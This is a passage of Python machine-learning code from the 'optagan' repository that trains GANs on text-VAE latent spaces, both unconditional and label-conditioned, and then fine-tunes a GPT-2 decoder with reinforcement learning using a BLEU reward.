help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Reinforcement learning parameters
parser.add_argument('--finetune_decoder', type=bool, default=True)
parser.add_argument('--epochs_rl', type=int, default=1000)
parser.add_argument('--batch_size_rl', type=int, default=32)
parser.add_argument('--lr_rl', type=float, default=1e-6)
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = Generator(args.n_layers, args.block_dim,args.latent_size)
critic = Critic(args.n_layers, args.block_dim,args.latent_size)
if args.generator_dir!=None:
logger.info("Loading generator and critic")
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
for i in range(2):
test_noise = torch.Tensor(np.random.normal(0, 1, (250, args.latent_size))).to(args.device)
test_z = generator(test_noise).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 250, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
if args.finetune_decoder:
logger.info("Loading generator")
generator.load_state_dict(torch.load(args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
model_decoder.train()
generator.eval()
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=1e-4, betas=(0.5, 0.999))
value_loss = nn.L1Loss()
B = args.batch_size_rl
total_scores = 0
total_entropy = 0
total_values = 0
total_v_loss = 0
for epoch_ in range(args.epochs_rl):
if epoch_ == 200:
# Finetune decoder after training of value head
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=args.lr_rl, betas=(0.5, 0.999))
noise = torch.from_numpy(np.random.normal(0, 1, (B, args.latent_size))).float()
noise = noise.to(args.device)
z_fake = generator(noise)
sents, logprobs, values, entropy = rollout(model_decoder, z_fake, tokenizer_decoder, args.max_seq_length, B, 1)
p_reference = random.sample(reference, 500)
blue = []
for i in sents:
blue.append(calc_blue_parallel_func(p_reference, [i], 1, 0))
values = torch.stack(values, dim=1)
logprobs = torch.stack(logprobs, dim=1)
entropy = torch.stack(entropy, dim=1)
# Get tokens and mask of batch
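# Note: 50258 and 50259 appear to be the <BOS> and <EOS> ids once the three special
# tokens are appended to the 50257-token GPT-2 vocabulary (so <PAD> = 50257); this is
# an assumption about the tokenizer ordering rather than something checked here.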
toks_gpt = [([50258] + tokenizer_decoder.encode(j) + [50259]) for j in sents]
toks_gpt, mask = pad_seq(toks_gpt, tokenizer_decoder.encode("<PAD>")[0], values.size(1)+1)
toks_gpt = torch.tensor(toks_gpt).to(args.device)
mask = torch.tensor(mask).to(args.device)
values = values * mask[:,1:]
logprobs = logprobs * mask[:,1:]
entropy = entropy * mask[:,1:]
scores = torch.tensor(blue).to(args.device)
# Get value loss
v_loss = value_loss(torch.sum(values, dim=1), scores)
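# RL fine-tuning scheme: for the first 200 iterations only the value-head objective is
# optimised (L1 loss between the summed per-token values and the sentence-level BLEU
# reward); from iteration 200 the learning rate switches to --lr_rl and a policy-gradient
# term on discounted per-token values, plus an entropy bonus that penalises low-entropy
# generations, is added.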
if epoch_ >= 200:
R = 0
rewards = []
# Discount future rewards back to the present using gamma
for j in range(len(values.tolist())):
R = 0
batch_rewards = []
for r in reversed(values.tolist()[j]):
R = r + 0.99 * R
batch_rewards.insert(0,R)
rewards.append(batch_rewards)
# Penalizing low entropy states
rewards = torch.FloatTensor(rewards).to(args.device)
rewards = rewards + torch.log(torch.clamp(entropy,0.2,1))
# Calculate loss
d_loss = torch.sum(torch.mul(logprobs, rewards.detach()).mul(-1))
else:
d_loss = torch.tensor(0)
# Backpropagate losses
loss = v_loss + d_loss
dec_optimizer.zero_grad()
loss.backward()
dec_optimizer.step()
total_scores += torch.mean(scores).item()
total_values += torch.mean(torch.sum(values,-1)).item()
total_v_loss += v_loss.item()
total_entropy += torch.mean(torch.mean(entropy,dim=1)).item()
if (epoch_ % args.interval) == 0:
logger.info("Batch {}/{} | Value Loss:{} | Mean values:{} | Mean BLEU scores:{} | Mean Entropy: {}".format(epoch_,
args.epochs_rl, total_v_loss/args.interval, total_values/args.interval, total_scores/args.interval, total_entropy/args.interval))
total_scores = 0
total_values = 0
total_v_loss = 0
total_entropy = 0
logger.info("Saving decoder")
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
if not os.path.exists(output_decoder_dir):
os.makedirs(output_decoder_dir)
model_decoder.save_pretrained(output_decoder_dir)
torch.save(args, os.path.join(output_decoder_dir, 'training_encoder_args.bin'))
2024-01-10 | Egojr/optagan | optagan~optagan_cond.py
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
import numpy as np
from modules.gan import cond_Generator, cond_Critic, Classifier
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader, BucketingDataLoaderYelp)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoaderYelp(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data, label): #
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample, label) #
outputs = torch.FloatTensor(B, 1).fill_(1.0) # args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
classifier.train()
cl_train_loss = 0.
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
label = x[3]
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise and labels
gen_labels = (torch.rand(args.per_gpu_train_batch_size, 1) * args.n_classes).type(torch.LongTensor)
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
label = label.cuda()
gen_labels = gen_labels.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise, gen_labels)
real_score = critic(z_real, label)
fake_score = critic(z_fake, gen_labels)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data, label.data)
pred_class = classifier(z_real)
cl_lab = label.clone().squeeze_()
# Classifier loss
cl_optimizer.zero_grad()
cl_loss = nn.CrossEntropyLoss()(pred_class.to(args.device), cl_lab)
cl_train_loss += cl_loss.item()
cl_loss.backward()
cl_optimizer.step()
# Train critic or generator
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise, gen_labels), gen_labels)
pred_gen_class = classifier(generator(noise, gen_labels)).to(args.device)
cl_gen_lab = gen_labels.clone().squeeze_()
g_cl_loss = nn.CrossEntropyLoss()(pred_gen_class, cl_gen_lab)
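# Conditional generator objective: the Wasserstein term is combined with the auxiliary
# classification loss on generated latents (weighted by a factor of 10) so that samples
# stay consistent with their conditioning label.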
g_loss = -torch.mean(fake_score) + g_cl_loss * 10
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f} | Cl Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item(), cl_loss.item()
))
test_lab = (torch.rand(1, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise, test_lab).data
# decode a sample sentence from the generated latent code for logging
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Label: {} | Text: {}".format(test_lab.item(), test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available()) # note: with type=bool, any non-empty command-line value parses as True
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str)
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder options
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Reinforcement learning parameters
parser.add_argument('--finetune_decoder', type=bool, default=True)
parser.add_argument('--epochs_rl', type=int, default=1000)
parser.add_argument('--batch_size_rl', type=int, default=32)
parser.add_argument('--lr_rl', type=float, default=1e-6)
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Note: resize_token_embeddings expects the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
critic = cond_Critic(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
classifier = Classifier(args.latent_size, args.block_dim, args.n_classes)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
classifier.load_state_dict(torch.load(args.generator_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th'))
cl_optimizer = optim.Adam(classifier.parameters(), lr=args.lr, betas=(0.5, 0.999))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
classifier = classifier.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
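# Note: the evaluation below generates 100 sentences for each of 5 hard-coded label
# values (0-4); adjust this block if args.n_classes differs.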
test_lab = torch.LongTensor([0]*100 + [1]*100 + [2]*100 + [3]*100 + [4]*100).to(args.device)
for i in range(5):
test_noise = torch.Tensor(np.random.normal(0, 1, (100, args.latent_size))).to(args.device)
test_z = generator(test_noise, test_lab[100*i:100*(i+1)]).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 100, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
data_test = [str(lab)+" "+str(sen) for lab,sen in zip(test_lab.tolist(), data_test)]
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500, True)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500, True)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
torch.save(classifier.state_dict(), args.output_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th')
if args.finetune_decoder:
logger.info("Loading generator")
generator.load_state_dict(torch.load(args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
model_decoder.train()
generator.eval()
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=1e-4, betas=(0.5, 0.999))
value_loss = nn.L1Loss()
B = args.batch_size_rl
total_scores = 0
total_entropy = 0
total_values = 0
total_v_loss = 0
for epoch_ in range(args.epochs_rl):
if epoch_ == 200:
# Finetune decoder after training of value head
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=args.lr_rl, betas=(0.5, 0.999))
gen_labels = (torch.rand(B, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
noise = torch.from_numpy(np.random.normal(0, 1, (B, args.latent_size))).float()
noise = noise.to(args.device)
z_fake = generator(noise, gen_labels)
sents, logprobs, values, entropy = rollout(model_decoder, z_fake, tokenizer_decoder, args.max_seq_length, B, 1)
lab_sents = [str(lab)+" "+str(sen) for lab,sen in zip(gen_labels.tolist(), sents)]
p_reference = random.sample(reference, 500)
blue = []
for i in lab_sents:
blue.append(calc_blue_parallel_func(p_reference, [i], 1, 0, True))
values = torch.stack(values, dim=1)
logprobs = torch.stack(logprobs, dim=1)
entropy = torch.stack(entropy, dim=1)
# Get tokens and mask of batch
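# 50258 / 50259 are assumed to be the ids of the <BOS> / <EOS> tokens added above
# (base GPT-2 vocabulary has 50257 tokens, so <PAD>=50257, <BOS>=50258, <EOS>=50259
# given that insertion order).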
toks_gpt = [([50258] + tokenizer_decoder.encode(j) + [50259]) for j in sents]
toks_gpt, mask = pad_seq(toks_gpt, tokenizer_decoder.encode("<PAD>")[0], values.size(1)+1)
toks_gpt = torch.tensor(toks_gpt).to(args.device)
mask = torch.tensor(mask).to(args.device)
values = values * mask[:,1:]
logprobs = logprobs * mask[:,1:]
entropy = entropy * mask[:,1:]
scores = torch.tensor(blue).to(args.device)
# Get value loss
v_loss = value_loss(torch.sum(values, dim=1), scores)
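# For the first 200 RL steps only the value loss is backpropagated (d_loss = 0 below),
# which is meant to fit the value head before fine-tuning the rest of the decoder.
# Afterwards a REINFORCE-style term is added: per-token value estimates are discounted
# into returns (gamma = 0.99), a clamped log-entropy bonus discourages degenerate
# low-entropy outputs, and the policy-gradient loss is -sum(logprob * reward).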
if epoch_ >= 200:
R = 0
rewards = []
# Discount future rewards back to the present using gamma
for j in range(len(values.tolist())):
R = 0
batch_rewards = []
for r in reversed(values.tolist()[j]):
R = r + 0.99 * R
batch_rewards.insert(0,R)
rewards.append(batch_rewards)
# Penalizing low entropy states
rewards = torch.FloatTensor(rewards).to(args.device)
rewards = rewards + torch.log(torch.clamp(entropy,0.2,1))
# Calculate loss
d_loss = torch.sum(torch.mul(logprobs, rewards.detach()).mul(-1))
else:
d_loss = torch.tensor(0)
# Backpropagate losses
loss = v_loss + d_loss
dec_optimizer.zero_grad()
loss.backward()
dec_optimizer.step()
total_scores += torch.mean(scores).item()
total_values += torch.mean(torch.sum(values,-1)).item()
total_v_loss += v_loss.item()
total_entropy += torch.mean(torch.mean(entropy,dim=1)).item()
if (epoch_ % args.interval) == 0:
logger.info("Batch {}/{} | Value Loss:{} | Mean values:{} | Mean BLEU scores:{} | Mean Entropy: {}".format(epoch_,
args.epochs_rl, total_v_loss/args.interval, total_values/args.interval, total_scores/args.interval, total_entropy/args.interval))
total_scores = 0
total_values = 0
total_v_loss = 0
total_entropy = 0
logger.info("Saving decoder")
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
if not os.path.exists(output_decoder_dir):
os.makedirs(output_decoder_dir)
model_decoder.save_pretrained(output_decoder_dir)
torch.save(args, os.path.join(output_decoder_dir, 'training_encoder_args.bin'))
| [] |
2024-01-10 | Egojr/optagan | optagan~ad_wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import numpy as np
from modules.gan import Generator, Critic
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data):
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample)
outputs = torch.FloatTensor(B, 1).fill_(1.0) #args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
